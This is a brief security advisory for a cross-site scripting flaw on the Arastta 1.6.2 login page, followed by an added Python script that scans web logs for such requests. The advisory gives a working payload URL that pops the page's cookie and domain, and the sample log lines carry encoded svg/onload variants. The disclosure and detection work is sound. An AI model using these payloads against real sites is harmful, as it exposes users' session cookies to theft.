Arastta version 1.6.2 suffers from a cross-site scripting vulnerability.
=================================================
Synopsis: Arastta 1.6.2 XSS vulnerability
Product: Arastta eCommerce: Free Shopping Cart
Version: 1.6.2
Researcher: Matt Landers
twitter.com/matthewjland
https://mjlanders.org/
=================================================
The XSS that I have found is actually right on the login page.
http://inserthostnamehere.com/index.php/login/"--!>GIF89a/*<svg/onload=alert(document.cookie)>*/=alert(document.domain)//;
Replace 'inserthostnamehere.com' with the server you would like to test.
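
A log check for the request shape shown above, added here as an example and not part of the original advisory: it flags requests whose path info after /index.php/login contains HTML markup once percent-decoding is undone. The combined log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in combined log format (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php/login/ HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php/login/%22--!%3E%3Csvg/onload=alert(1)%3E HTTP/1.1" 200 5301
198.51.100.2 - - [01/Jan/2024:10:01:12 +0000] "GET /index.php/login/%2522%253E%253Csvg%2520onload%253Dx%253E HTTP/1.1" 200 5290
198.51.100.7 - - [01/Jan/2024:10:02:30 +0000] "GET /index.php?route=account/login HTTP/1.1" 200 5120
"""

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
LOGIN_PREFIX = "/index.php/login"
# HTML metacharacters or an inline event-handler attribute in the path info.
MARKUP = re.compile(r"""[<>"']|\bon\w+\s*=""", re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_login_requests(log_text):
    """Return (client, decoded path info) for login requests carrying markup."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if not match:
            continue
        path = decode_fully(urlsplit(match.group("target")).path)
        if not path.lower().startswith(LOGIN_PREFIX):
            continue
        path_info = path[len(LOGIN_PREFIX):]
        if MARKUP.search(path_info):
            hits.append((line.split()[0], path_info))
    return hits


if __name__ == "__main__":
    for client, path_info in suspicious_login_requests(SAMPLE_LOG):
        print(client, repr(path_info))
```

A hit means only that markup was sent in the login path; whether it was reflected unencoded has to be confirmed against the response body.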